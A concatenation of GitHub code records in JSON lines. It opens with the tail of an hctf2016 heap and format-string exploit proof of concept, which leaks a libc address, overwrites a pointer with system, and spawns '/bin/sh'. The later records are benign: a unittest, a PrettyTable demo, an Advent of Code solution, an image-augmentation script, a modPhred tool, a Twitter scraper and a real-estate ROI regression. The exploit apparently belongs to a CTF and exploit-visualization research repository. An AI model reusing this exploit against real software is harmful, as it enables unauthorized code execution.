p.recvuntil(\"3.quit\\n\")\n p.sendline(\"create \")\n p.sendlineafter(\"Pls give string size:\", str(size))\n p.sendafter(\"str:\", string)\ndef delete(idx):\n p.recvuntil(\"3.quit\\n\")\n p.sendline(\"delete \")\n p.sendlineafter(\"id:\", str(idx))\n p.sendlineafter(\"Are you sure?:\", \"yes\")\ncreate(4, \"a\") # 0\ncreate(4, \"b\") # 1\n\ndelete(1)\ndelete(0)\n\ncreate(0x20, b'Start%176$pEnd'.ljust(0x18, b'c') + p8(0xB6)) # 0\n\ndelete(1)\n\np.recvuntil(\"Start\")\nlibc_start_main_ret_addr = int(p.recvuntil(\"End\", drop=True), 16)\n\nsystem_addr = libc_start_main_ret_addr + 0x24b60\n\nlog.success(\"__libc_start_main_ret address: \" + hex(libc_start_main_ret_addr))\nlog.success(\"system address: \" + hex(system_addr))\n\np.sendline(\"\")\np.sendline(\"\")\n\ndelete(0)\ncreate(0x20, b\"/bin/sh;\".ljust(24, b\"p\") + p64(system_addr))\n\ndelete(1)\n\np.interactive()\n","repo_name":"CGCL-codes/SCVDT","sub_path":"Binary-Exploit-Visualization/exploit_samples/hctf2016/poc.py","file_name":"poc.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"39"} +{"seq_id":"2012317274","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport unittest\nimport sys\nimport pp_wxh\n\ndef readGraph(fileName):\n graph = []\n with open(fileName,'r') as f:\n f.readline()\n while 1:\n line = f.readline()\n if not line:\n break\n line = line.strip('[]\\n')\n a = list(line.split(\",\"))\n a = [int(x) for x in a]\n if a[0] == -1:\n a = []\n graph.append(a)\n graph = sorted(graph, key = lambda a:(len(a),a))\n return graph\n\nclass TestPrime(unittest.TestCase):\n\n def setUp(self):\n print(\"test case start\")\n\n def test_primt(self):\n path = sys.path[0]\n pathName = path + 'anwser'+'/anwser6.txt'\n ans=readGraph(pathName)\n primePath = pp_wxh.getPrimePath()\n print(self.assertEqual(primePath.getResult(),ans))\n \n def tearDown(self):\n print(\"test case end\")\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"wangxianh/exercise","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"15840030930","text":"# from re import S\r\n# from turtle import Turtle, Screen\r\n\r\n# timmy = Turtle()\r\n# print(timmy)\r\n\r\n# timmy.shape(\"turtle\")\r\n# timmy.color(\"coral\")\r\n# timmy.fd(100)\r\n# my_screen = Screen()\r\n# my_screen.bgcolor('gray')\r\n\r\n# print(my_screen.canvheight)\r\n# my_screen.exitonclick()\r\n\r\nfrom calendar import c\r\nfrom prettytable import PrettyTable\r\ntable = PrettyTable()\r\ntable.add_column(\"Pokemon Name\", [\"Pickachu\", \"Squirtle\", \"Charmander\"])\r\ntable.add_column(\"Type\", [\"Electric\", \"Water\", \"Fire\"])\r\ntable.align[\"Pokemon Name\"] = \"c\"\r\ntable.align[\"Type\"] = \"c\"\r\n\r\nprint(table)\r\n","repo_name":"Chaoci/100days-Python-Projects","sub_path":"day16-coffee-machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"2961785143","text":"import sys \nsys.path.append('..')\n\nimport copy\nfrom collections import defaultdict\nfrom helper import *\n\nFILENAME = '20_dat.txt'\nPADDING = 1\nmapper = {}\n\ndef main():\n data = readlines_split_by_newlines(FILENAME)\n alg = data[0][0]\n img = [list(dat) for dat in data[1:][0]]\n # data = [int(dat) for dat in data]\n assert(len(alg) == 512)\n # print(alg)\n # print_2d(img)\n once, outside = iter_image(img, alg, 0) # outside of initial image is 0\n # print_2d(once)\n twice, outside = iter_image(once, alg, outside)\n # print_2d(twice)\n\n print('final', count_img(twice))\n\ndef iter_image(img, alg, outside):\n new_img = [[None for j in range(len(img[0])+2*PADDING)] for i in range(len(img)+2*PADDING)]\n\n def get_old(i, j):\n old_i = i-PADDING\n old_j = j-PADDING\n if old_i < 0 or old_j < 0 or old_i >= len(img) or old_j >= len(img[0]):\n return outside\n else:\n return 0 if img[old_i][old_j] == '.' else 1\n\n for i in range(len(new_img)):\n for j in range(len(new_img[0])):\n neighbors = [\n get_old(i-1,j-1),\n get_old(i-1,j),\n get_old(i-1,j+1),\n get_old(i,j-1),\n get_old(i,j),\n get_old(i,j+1),\n get_old(i+1,j-1),\n get_old(i+1,j),\n get_old(i+1,j+1),\n ]\n code = bin_to_int(''.join([str(neighbor) for neighbor in neighbors]))\n # print(i, j, code)\n new_img[i][j] = alg[code]\n\n return new_img, 0 if (alg[0] if outside == 0 else alg[-1]) == '.' else 1\n\ndef count_img(img):\n return sum([c == '#' for c in flatten(img)])\n\n# Time: 21:46\n\ndef main2():\n data = readlines_split_by_newlines(FILENAME)\n alg = data[0][0]\n img = [list(dat) for dat in data[1:][0]]\n # data = [int(dat) for dat in data]\n assert(len(alg) == 512)\n # print(alg)\n # print_2d(img)\n outside = 0\n for i in range(50):\n img, outside = iter_image(img, alg, outside)\n # print_2d(img)\n\n print('final', count_img(img))\n\n# Time: 23:53\n\nif __name__ == '__main__':\n main()\n main2()\n","repo_name":"jautung/advent","sub_path":"advent2021/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28356409400","text":"from os import listdir\r\nfrom os.path import isfile\r\nfrom PIL import Image\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\n\r\nimport imgaug.augmenters as iaa\r\n\r\nimport os\r\nimport random\r\nfrom os.path import join\r\nimport matplotlib.pyplot as plt\r\n\r\nDATA_DIR = 'DATA DIR'\r\nos.chdir(DATA_DIR)\r\n\r\n\r\nIMAGE_DIR = join(DATA_DIR, 'dataset\\\\PascalVOC-OG-flipped\\\\JPEGImages')\r\nANN_DIR = join(DATA_DIR, 'dataset\\\\PascalVOC-OG-flipped\\\\Annotations')\r\n\r\nNEW_IMAGE_DIR = join(DATA_DIR, 'dataset\\\\PascalVOC-OG-all\\\\JPEGImages')\r\nNEW_ANN_DIR = join(DATA_DIR, 'dataset\\\\PascalVOC-OG-all\\\\Annotations')\r\n\r\nNEW_IMAGE_SETS_DIR = join(DATA_DIR, 'dataset\\\\PascalVOC-OG-all\\\\ImageSets\\\\Main')\r\n\r\nMAX = 2\r\n\r\nwith open(join(NEW_IMAGE_SETS_DIR, f\"pipe-augmented-degrade.txt\"), 'w+') as f:\r\n pass\r\n\r\nimage_files = [f for f in listdir(IMAGE_DIR) if isfile(join(IMAGE_DIR, f))]\r\nshuffled_image_files = random.sample(image_files, len(image_files))\r\nshuffled_image_files = random.sample(image_files, len(shuffled_image_files))[:MAX]\r\n\r\nseq = iaa.Sequential([\r\n iaa.JpegCompression(compression=(99, 99))\r\n])\r\n\r\n\r\nfor image in tqdm(shuffled_image_files):\r\n if len(image) > 0:\r\n # Åpne bildet\r\n im = Image.open(join(IMAGE_DIR, image))\r\n\r\n # Gjøre om til array med type uint8, (1920, 1080, 3)\r\n im = np.asarray(im).astype(np.uint8)\r\n\r\n # Ekspandere arrayet til å se ut som (1, 1920, 1080, 3), nødvendig siden iaa forventer en 4D matrise\r\n im_expand = np.expand_dims(im, 0)\r\n\r\n # Augmentere bildet\r\n augmented_image_array = seq(images=im_expand)\r\n\r\n # Fjerne ekstra dimensjonen satt på tidligere på første akse, resultat: (1920, 1080, 3)\r\n augmented_image_array = np.squeeze(augmented_image_array, axis=0)\r\n\r\n # Laste inn array som bilde\r\n augmented_image = Image.fromarray(augmented_image_array)\r\n\r\n # Laste inn bildet igjen fra matriseformat.\r\n im = Image.fromarray(im)\r\n im.save('im1.jpeg')\r\n augmented_image.save('im2.jpeg')\r\n fig, ax = plt.subplots(nrows=1, ncols=2)\r\n\r\n # Plotting\r\n plt.subplot(1, 2, 1)\r\n plt.imshow(im)\r\n\r\n plt.subplot(1, 2, 2)\r\n plt.imshow(augmented_image)\r\n plt.show()\r\n\r\n","repo_name":"Laende/Bacheloroppgave-droneteknologi","sub_path":"utils/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73888884843","text":"#!/usr/bin/env python3\ndesc=\"\"\"Report correlation between all modified positions\n\nMore info at: https://github.com/lpryszcz/modPhred\n\"\"\"\nepilog=\"\"\"Author: l.p.pryszcz+git@gmail.com\nBarcelona, 3/02/2020\n\"\"\"\n\nimport glob, gzip, os, pickle, pysam, sys, zlib\nfrom collections import Counter\nfrom datetime import datetime\nfrom multiprocessing import Pool\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom guppy_encode import HEADER, VERSION, logger, memory_usage, load_info, base2complement, MaxModsPerBase\nfrom mod_report import is_qcfail, base2index, code2function\n\ncomplement = {\"A\": \"T\", \"C\": \"G\", \"G\": \"C\", \"T\": \"A\"}\n\ndef baseq2int(b, q, minModProb, MaxPhredProb, base2index=base2index, maxMods=10):\n \"\"\"Return int representation of modification\n\n For example:\n - A (base 1) with modification probability of\n - 31 will be stored as 1 (first mod of A) because 1 + 0*maxMods\n - C (base 2) with modification probability of\n - 50 will be stored as 12 (second mod of C) because 2 + 1*maxMods\n \"\"\"\n # ignore mod prob below minModProb - store as 255\n if (q%MaxPhredProb)end:\n bases -= refi-end\n if bases<1:\n break\n # process bases of aligned block\n for ii, (b, q) in enumerate(zip(a.seq[preadi:preadi+bases], a.query_qualities[preadi:preadi+bases]), prefi+1):\n if ii in pos2idx:\n # get complement if read mapped to rev strand\n if a.is_reverse: b = complement[b]\n # store most likely modification as int if larger than minModProb\n modi = baseq2int(b, q, minModProb, MaxPhredProb)\n if modi:\n #if modi<255: print(readidx, ii, pos2idx[ii], b, q, base2index[b], modi)\n #if b==\"C\" and 10000] #np.all((quals[posidx]>0, quals[posidx]<255), axis=0)]\n posidx += 1\n # store modifications from alignment blocks\n quals, readidx = store_blocks(a, start, end, pos2idx, quals, readidx, minModProb, MaxPhredProb)\n # release some more memory\n if readidx==maxDepth:\n #sys.stderr.write(\"[INFO] maxDepth reached\\n\"); break ### to be done\n first = np.argwhere(quals[posidx, :readidx])[0][0]\n if first<0.05*maxDepth: first = int(0.05*maxDepth)\n quals = np.hstack((quals[:, first:], np.zeros((len(positions), first), dtype='uint8')))\n sys.stderr.write(\"[INFO][%s] Dropped %s previous columns/reads\\n\"%(bam, first))\n readidx -= first\n # yield last bit of calls\n while posidx0]\n posidx += 1\n\ndef chr2modcorr(outfn, bams, region, chrdata, mapq, mindepth, minModProb, MaxPhredProb, minmodreads=10):\n \"\"\"Calculate correlation between modifications\"\"\"\n cols = [\"chr\", \"pos\", \"mod\", \"strand\"]\n # get chr and positions\n ref, positions = chrdata.chr.unique()[0], np.unique(chrdata.pos.to_numpy())\n corrs = np.zeros((len(positions), len(positions)), dtype=\"float32\")\n corrs[:] = np.nan\n logger(\" %s with %s modified positions > %s\"%(region, len(positions), outfn))\n parsers = [bam2calls(bam, ref, positions, mapq, minModProb, MaxPhredProb) for bam in bams]\n for i, calls in enumerate(zip(*parsers)):\n # stack all reads - those are already prefiltered for only those modified for given position\n calls = np.hstack(calls)\n sys.stderr.write(\" %s \\r\"%i)\n # get modified positions\n #mod = calls!=255\n # get positions with mindepth\n enoughdepth = np.where(np.sum(calls>0, axis=1)>=mindepth)[0]\n print(Counter(calls[i]), enoughdepth.sum())\n # store correlations between this positions\n for j in filter(lambda x: x>=i, enoughdepth):\n # mod in i and j and take balanced number of modified reads for each position\n modi = np.argwhere(np.all((calls[i]>0, calls[i]<255, calls[j]>0), axis=0)) #calls[i]>0, calls[i]<255 #calls[i]==1\n modj = np.argwhere(np.all((calls[j]>0, calls[j]<255, calls[i]>0), axis=0)) #calls[j]>0, calls[j]<255 #calls[j]==1\n lessmod = min(len(modi), len(modj))\n sel = np.unique(list(modi[:lessmod]) + list(modj[:lessmod]))\n if len(sel)0), axis=0)\n # skip if less than 10 reads with modification at least in 1 position\n if sel.sum()0, calls<255), axis=0)\n modreadsum = modreads.sum(axis=1) \n # get positions with mindepth\n enoughdepth = np.where(np.sum(calls>0, axis=1)>=mindepth)[0]\n # store correlations between this positions\n for j in filter(lambda x: x>=i, enoughdepth):\n # choose _i that it always has more modified positions than _j\n if np.argmax(modreadsum[[i, j]]):\n _j, _i = i, j\n else:\n _i, _j = i, j\n # select only reads modified in the position with more modifications\n # and with bases called in both\n sel = np.all((modreads[_i], calls[_j]>0), axis=0) #; print(i, j, modreadsum[[i, j]])\n # skip if less than 10 reads with modification at least in 1 position\n if sel.sum()=s, df.pos<=e), axis=0)]\n if strand:\n df = df[df.strand==strand]\n regionsData.append(df)\n return regionsData\n \ndef mod_correlation(outdir, infn, bamfiles, ext=\"png\", logger=logger, data=False,\n overwrite=False, regions=[], samples=[], \n minfreq=0.20, mindepth=10, minModProb=0.5, mapq=15,\n strand=None, mod=None):\n if not outdir:\n outdir = os.path.join(os.path.dirname(infn), \"correlations\")\n if not os.path.isdir(outdir):\n os.makedirs(outdir)\n # load info\n moddata = load_info(os.path.dirname(infn))\n MaxPhredProb = moddata[\"MaxPhredProb\"]\n if not bamfiles:\n bamfiles = moddata[\"bam\"]\n bamfiles.sort()\n # BAM > modifications\n # get can2mods ie {'A': ['6mA'], 'C': ['5mC'], 'G': [], 'T': []}\n can2mods = {b: [moddata[\"symbol2modbase\"][m] for m in mods]\n for b, mods in moddata[\"canonical2mods\"].items()}#; print(can2mods)\n #print(MaxPhredProb, can2mods, bamfiles)\n \n # parse data\n if isinstance(data, bool):\n logger(\"Loading %s ...\\n\"%infn)\n data = pd.read_csv(infn, sep=\"\\t\", header=len(HEADER.split('\\n'))-2, index_col=False,\n dtype={\"chr\": object, \"pos\": int}) # ADD TO ALL\n # filter by min freq and depth\n mfreqcols = list(filter(lambda x: x.endswith('mod_frequency'), data.columns)); mfreqcols\n depthcols = list(filter(lambda x: x.endswith('depth'), data.columns)); depthcols\n filters = [data.loc[:, mfreqcols].max(axis=1)>minfreq, data.loc[:, depthcols].max(axis=1)>mindepth]\n # add filters for strand and modification\n if mod:\n filters.append(data[\"mod\"]==mod)\n data = data[np.all(filters, axis=0)]\n #print(data.shape, data.head())\n # limit by region AND CONSIDER LIMITING COV TO 2-3x median?\n if regions:\n # get regions logger(\" limiting to %s regions: %s\\n\"%(len(regions), \",\".join(regions)))\n regionsData = get_data_for_regions(data, regions)\n logger(\"Processing %s region(s): %s ...\\n\"%(len(regions), \",\".join(regions)[:3]))\n else:\n # get chromosomes\n regions = data.chr.unique()\n #if strand: filters.append(data.strand==strand)\n regionsData = (data[data.chr==ref] for ref in regions)\n logger(\"Processing %s chromosome(s): %s ...\\n\"%(len(regions), \",\".join(regions)[:3]))\n if data.shape[0]<1:\n logger(\"[mod_plot][ERROR] %s row(s) found in %s\\n\"%(data.shape[0], infn))\n return\n # process regions/chromosomes\n for ref, chrdata in zip(regions, regionsData):\n # define output\n fn = \"%s.csv.gz\"%ref\n if mod: fn = \"%s.%s.csv.gz\"%(ref, mod)\n outfn = os.path.join(outdir, fn)\n if overwrite or not os.path.isfile(outfn):\n # generate data\n corrs = chr2modcorr(outfn, bamfiles, ref, chrdata, mapq, mindepth, minModProb, MaxPhredProb)\n else:\n # load data\n corrs = np.loadtxt(outfn, delimiter=\",\")\n # plot\n plot_heatmap(corrs, chrdata, ref, outfn, ext=ext)\n # maybe plot below freq? that would be cool, right?\n\ndef collapse_axes(xlab, ylab):\n \"\"\"Return X/Y labels for unique X positions\"\"\"\n _xlab, _ylab, pos = [xlab[0]], [ylab[0]], [0]\n for i in range(1, len(xlab)):\n if xlab[i] == xlab[i-1]:\n _ylab[-1] += \"; %s\"%ylab[i]\n else:\n _xlab.append(xlab[i])\n _ylab.append(ylab[i])\n pos.append(i)\n return _xlab, _ylab, pos\n \ndef plot_heatmap(corrs, chrdata, ref, outfn, figsize=(12, 10), dim=100000, ext=\"svg\", simpleY=True):\n \"\"\"Plot heatmaps\"\"\"\n # narrow by strands\n xlab = chrdata.pos[:dim].to_numpy()\n ylab = [\"%s %s\"%(m, s) for m, s in zip(chrdata[\"mod\"][:dim], chrdata.strand[:dim])]\n mod2count = Counter(chrdata[\"mod\"])\n xlab, ylab, pos = collapse_axes(xlab, ylab)\n # use unique names on Y\n if simpleY:\n _ylab = [ylab[i] if ylab[i]!=ylab[i-1] else \"\" for i in range(1, len(ylab))]\n _ylab.insert(0, ylab[0])\n ylab = _ylab\n # switch axes labels\n #xlab, ylab = ylab, xlab\n logger(\" Plotting %s modified positions in %s:%s-%s\"%(len(chrdata), ref, xlab[0], xlab[-1]))\n #mask = np.zeros_like(corrs)\n #mask[np.triu_indices_from(mask)] = True\n #f, ax = plt.subplots(figsize=figsize)\n fig = plt.figure(figsize=figsize)\n # add title\n mcounts = \"; \".join(\"%s: %s\"%(m, c) for m, c in mod2count.items())\n fig.suptitle(\"\\n%s\\n%s modifications: %s\"%(ref, len(chrdata), mcounts))\n fig.subplots_adjust(top=0.75) \n with sns.axes_style(\"white\"):\n ax = sns.heatmap(corrs, vmin=-1, vmax=1, center=0, cmap=\"RdBu_r\", #mask=mask, #fmt=\"d\"\n xticklabels=xlab, yticklabels=ylab)\n #ax.xaxis.tick_top() \n ax.set_xlabel(\"Modified positions\")\n ax.set_ylabel(\"Modifications at those positions [with +/- strand]\")\n # calculate global frequency\n depthcols = list(filter(lambda c: c.endswith(\"depth\"), chrdata.columns))\n mfreqcols = list(filter(lambda x: x.endswith('mod_frequency'), chrdata.columns))\n mcountcols = [\"%s modcount\"%c.split()[0] for c in depthcols]\n for cc, fc, dc in zip(mcountcols, depthcols, mfreqcols):\n chrdata[cc] = chrdata[fc] * chrdata[dc]\n chrdata[\"avgfreq\"] = chrdata[mcountcols].sum(axis=1) / chrdata[depthcols].sum(axis=1)\n ax2 = fig.add_axes([.125, 0.77, .62, .10], anchor=\"N\", sharex=ax)\n ax2.bar(np.arange(len(corrs))+0.5, chrdata[\"avgfreq\"].to_numpy()[pos])\n ax2.set_ylim((0, 1)); ax2.set_ylabel(\"mod\\nfreq\")\n ax2.xaxis.tick_top() #ax2.set_xticklabels([]) #\n ax2.set_xticklabels(xlab, rotation=90)\n fig.savefig(outfn+\".%s\"%ext) #show()\n \ndef main():\n import argparse\n usage = \"%(prog)s -v\" #usage=usage, \n parser = argparse.ArgumentParser(description=desc, epilog=epilog, \\\n formatter_class=argparse.RawTextHelpFormatter)\n \n parser.add_argument('--version', action='version', version=VERSION) \n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"verbose\") \n parser.add_argument(\"-i\", \"--input\", default=\"modPhred/mod.gz\", help=\"input file [%(default)s]\")\n parser.add_argument(\"-o\", \"--outdir\", default=\"modPhred/correlations\", help=\"output dir [%(default)s]\")\n parser.add_argument(\"-b\", \"--bams\", default=[], nargs=\"*\", help=\"input BAMs [read from mod.gz]\")\n parser.add_argument(\"-m\", \"--mapq\", default=15, type=int, help=\"min mapping quality [%(default)s]\")\n parser.add_argument(\"-d\", \"--minDepth\", default=25, type=int, help=\"min depth of coverage [%(default)s]\")\n parser.add_argument(\"--minModFreq\", default=0.20, type=float, help=\"min modification frequency per position [%(default)s]\")\n parser.add_argument(\"--minModProb\", default=0.50, type=float, help=\"min modification probability per base [%(default)s]\")\n #parser.add_argument(\"-s\", \"--strand\", default=None, choices=[\"+\", \"-\"], help=\"select strand [include both]\")\n parser.add_argument(\"--mod\", default=\"\", help=\"filter only 1 modification [analyse all]\")\n parser.add_argument(\"-r\", \"--regions\", nargs=\"+\", default=[], help=\"regions to process [all chromosomes]\") \n parser.add_argument(\"-w\", \"--overwrite\", action=\"store_true\", help=\"overwrite existing output\") \n parser.add_argument(\"-e\", \"--ext\", default=\"svg\", help=\"figure format/extension [%(default)s]\")\n\n o = parser.parse_args()\n if o.verbose:\n sys.stderr.write(\"Options: %s\\n\"%str(o))\n\n if not o.regions:\n logger(\"Processing entire chromosomes - consider narrowing to certain regions!\")\n \n mod_correlation(o.outdir, o.input, o.bams, ext=o.ext, mapq=o.mapq,\n overwrite=o.overwrite, regions=o.regions, mod=o.mod, \n minfreq=o.minModFreq, mindepth=o.minDepth, minModProb=o.minModProb)\n logger(\"Finished\\n\")\n\nif __name__=='__main__': \n t0 = datetime.now()\n try:\n main()\n except KeyboardInterrupt:\n sys.stderr.write(\"\\nCtrl-C pressed! \\n\")\n #except IOError as e:\n # sys.stderr.write(\"I/O error({0}): {1}\\n\".format(e.errno, e.strerror))\n dt = datetime.now()-t0\n sys.stderr.write(\"#Time elapsed: %s\\n\"%dt)\n","repo_name":"novoalab/modPhred","sub_path":"src/mod_correlation.py","file_name":"mod_correlation.py","file_ext":"py","file_size_in_byte":17536,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"16747727773","text":"import requests\r\nimport os\r\nimport json\r\nfrom requests_oauthlib import OAuth1\r\nfrom auth import *\r\n\r\n#SET URL AND AUTH\r\nurl = 'https://api.twitter.com/1.1/search/tweets.json'\r\nauth = OAuth1(CONSUMER_KEY, CONSUMER_SECRET, TOKEN, TOKEN_SECRET)\r\n\r\n#GET IMPORTANT GLOBAL VAR\r\nq = input(\"Query: \")\r\nnb_r = input(\"Request's number: \")\r\n\r\n#GET QUERY\r\nquery = requests.get(url, params={'q': q, 'count': 50}, auth=auth)\r\n\r\n#SET VAR MAX & MIN\r\nmax_id = query.json()['search_metadata']['max_id'] + 2500000000000000\r\nmin_id = query.json()['search_metadata']['since_id']\r\nmax = max_id\r\nmin = min_id\r\n\r\n#SET GLOBAL VARS\r\nall_id = {}\r\nnb_t = 0\r\ntheapi = {}\r\nq_array_mrg = {}\r\n#DELETE PREVIOUS QUERIES FROM Q\r\n\r\n#SCRAPER\r\nfor i in range(int(nb_r)):\r\n querys = requests.get(url, params={'q': q, 'count': 50, 'since_id': min, 'max_id': max}, auth=auth)\r\n if 'statuses' not in querys.json():\r\n max = max + 2500000000000000\r\n min = min + 2500000000000000\r\n else:\r\n json_query = querys.json()['statuses']\r\n count_json = len(json_query)\r\n if count_json == 0:\r\n max = max + 2500000000000000\r\n min = min + 2500000000000000\r\n else:\r\n for n in range(count_json):\r\n ids = querys.json()['statuses'][n]['id']\r\n all_id[i] = ids\r\n if count_json > 0:\r\n if i == 0:\r\n print(query.json()['search_metadata']['max_id'])\r\n nb_t += count_json \r\n for n in range(count_json):\r\n querys.json()['statuses'][n]['id']\r\n id = querys.json()['statuses'][n]['id']\r\n text = querys.json()['statuses'][n]['text']\r\n created_at = querys.json()['statuses'][n]['created_at']\r\n q_array_mrg[n] = [{'id': id, 'text': text, 'created_at': created_at}]\r\n theapi['query'+str(i)] = q_array_mrg\r\n else:\r\n print(query.json()['search_metadata']['max_id'])\r\n im = i - 1\r\n is_equal = all_id[im] == all_id[i]\r\n if is_equal == True:\r\n max = max + 2500000000000000\r\n min = min + 2500000000000000\r\n else:\r\n nb_t += count_json\r\n for n in range(count_json):\r\n id = querys.json()['statuses'][n]['id']\r\n text = querys.json()['statuses'][n]['text']\r\n created_at = querys.json()['statuses'][n]['created_at']\r\n q_array_mrg[n] = [{'id': id, 'text': text, 'created_at': created_at}]\r\n theapi['query'+str(i)] = q_array_mrg\r\n max = max + 2500000000000000\r\n min = min + 2500000000000000\r\n\r\ndirectory = q\r\npath_dir = r\"C:\\Users\\axelz\\OneDrive\\Documents\\Epitech Digital\\Projet\\Storks\\Storks\\resources\\json\"\r\nif not os.path.exists(path_dir + \"\\\\\"+ q):\r\n os.mkdir(os.path.join(path_dir, q))\r\nf = open(os.path.join(path_dir + \"\\\\\"+ q, q + '.json'), 'w')\r\ntotal = json.dumps(theapi)\r\nf.write(total)\r\nf.close\r\n\r\n#ANSWER\r\nprint('La requête a permis de récolter ' + str(nb_t) + ' tweets')","repo_name":"AxelZouebi/D-NAT-200_2025-Axel.Zouebi","sub_path":"requests/Scrape/Twitter_scrape.py","file_name":"Twitter_scrape.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27949624832","text":"import os\nimport pandas as pd\nimport numpy as np\nimport random\nimport datetime\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import LabelEncoder\nfrom ydata_profiling import ProfileReport\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import r2_score\n\n\ndef generate_data(path_file: str, num_rows: int) -> None:\n data: pd.DataFrame = pd.DataFrame(columns=[\n 'ID da Propriedade', 'Tipo de Imóvel', 'Localização',\n 'Número de Quartos', 'Número de Banheiros', 'Área Total (em metros quadrados)',\n 'Idade da Propriedade', 'Condição da Propriedade', 'Amenidades', 'Preço de Venda Anterior',\n 'Data de Venda Anterior', 'Histórico de Aluguel', 'Taxas de Juros Atuais', 'Custos de Manutenção Anuais',\n 'Taxas de Condomínio Mensais', 'Impostos sobre a Propriedade', 'Histórico de Valorização',\n 'Fluxos de Caixa Anuais', 'Retorno sobre Investimento (ROI)', 'Data de Inclusão no Dataset',\n 'Fonte dos Dados'\n ])\n\n idade_imovel: int = np.random.randint(1, 50, num_rows)\n preco_anterior: int = np.random.randint(50000, 5000000, num_rows)\n area_total: float = np.random.uniform(50, 300, num_rows)\n taxas_juros: float = np.random.uniform(2, 6, num_rows)\n valor_alugueis: int = np.random.randint(500, 5000, num_rows)\n custos_manutencao_anual: float = np.random.uniform(100, 5000, num_rows)\n impostos_sobre_imovel: float = np.random.uniform(500, 5000, num_rows)\n taxas_condominio: float = np.random.uniform(50, 500, num_rows)\n\n roi: float = (0.2 * idade_imovel + 0.4 * preco_anterior + 0.2 * area_total + 0.3 + taxas_juros * 0.2\n + 0.4 * valor_alugueis + 0.3 * custos_manutencao_anual + 0.1 * impostos_sobre_imovel + 0.1 *\n taxas_condominio + np.random.normal(0, 2, num_rows))\n\n for i in range(num_rows):\n id_propriedade: int = i\n print(i)\n\n data = data.append({\n 'ID da Propriedade': id_propriedade,\n 'Tipo de Imóvel': random.choice(['Casa', 'Apartamento', 'Condomínio']),\n 'Localização': f'Cidade {random.randint(1, 10)}',\n 'Número de Quartos': random.randint(1, 6),\n 'Número de Banheiros': random.randint(1, 4),\n 'Área Total (em metros quadrados)': area_total[i],\n 'Idade da Propriedade': idade_imovel[i],\n 'Condição da Propriedade': random.choice(['Excelente', 'Boa', 'Média', 'Ruim']),\n 'Amenidades': ', '.join(random.sample(['Piscina', 'Garagem', 'Jardim', 'Vista panorâmica'], 2)),\n 'Preço de Venda Anterior': preco_anterior[i],\n 'Data de Venda Anterior': datetime.date(random.randint(1980, 2023), random.randint(1, 12),\n random.randint(1, 28)),\n 'Histórico de Aluguel': random.choice(['Sim', 'Não']),\n 'Valor aluguel': valor_alugueis[i],\n 'Taxas de Juros Atuais': taxas_juros[i],\n 'Custos de Manutenção Anuais': custos_manutencao_anual[i],\n 'Taxas de Condomínio Mensais': taxas_condominio[i],\n 'Impostos sobre a Propriedade': impostos_sobre_imovel[i],\n 'Histórico de Valorização': random.uniform(0.1, 0.5),\n 'Fluxos de Caixa Anuais': random.uniform(1000, 50000),\n 'Retorno sobre Investimento (ROI)': roi[i],\n 'Preço de Venda Atual': random.randint(50000, 5000000),\n 'Data de Inclusão no Dataset': datetime.date(random.randint(2010, 2023), random.randint(1, 12),\n random.randint(1, 28)),\n 'Fonte dos Dados': random.choice(['Zillow', 'Kaggle', 'Redfin'])\n }, ignore_index=True)\n\n data.to_csv(path_file, index=False)\n\n\ndef train_and_evaluate_decision_tree(x_treino_dt: pd.DataFrame, y_treino_dt: pd.Series, x_teste_dt: pd.DataFrame,\n y_teste_dt: pd.Series) -> None:\n decision_tree_model = DecisionTreeRegressor()\n decision_tree_model.fit(x_treino_dt, y_treino_dt)\n\n predicates = decision_tree_model.predict(x_teste_dt)\n\n score = r2_score(y_teste_dt, predicates)\n print(\"Decision tree R² Score:\", score)\n\n\ndef train_and_evaluate_linear_regression(x_treino_lr: pd.DataFrame, y_treino_lr: pd.Series, x_teste_lr: pd.DataFrame,\n y_teste_lr: pd.Series) -> None:\n linear_regression_model = LinearRegression()\n linear_regression_model.fit(x_treino_lr, y_treino_lr)\n score = linear_regression_model.score(x_teste_lr, y_teste_lr)\n print('LinearRegression: ', score)\n\n\nif __name__ == '__main__':\n path: str = './data/dataset_imobiliario.csv'\n if not os.path.isfile(path):\n generate_data(path, 10000)\n\n df: pd.DataFrame = pd.read_csv(path)\n profile: ProfileReport = ProfileReport(df, title=\"Profiling Report\")\n profile.to_file(\"report.html\")\n\n le: LabelEncoder = LabelEncoder()\n data_encoded: pd.DataFrame = df.apply(lambda col: le.fit_transform(col) if col.dtype == 'object' else col)\n\n y: pd.DataFrame = data_encoded['Retorno sobre Investimento (ROI)']\n x: pd.DataFrame = data_encoded.loc[:, df.columns != 'Retorno sobre Investimento (ROI)']\n\n x_treino, x_teste, y_treino, y_teste = train_test_split(x, y, test_size=0.2, random_state=23)\n\n train_and_evaluate_decision_tree(x_treino, y_treino, x_teste, y_teste)\n\n train_and_evaluate_linear_regression(x_treino, y_treino, x_teste, y_teste)\n","repo_name":"Eduardo681/crispdm","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5571,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} 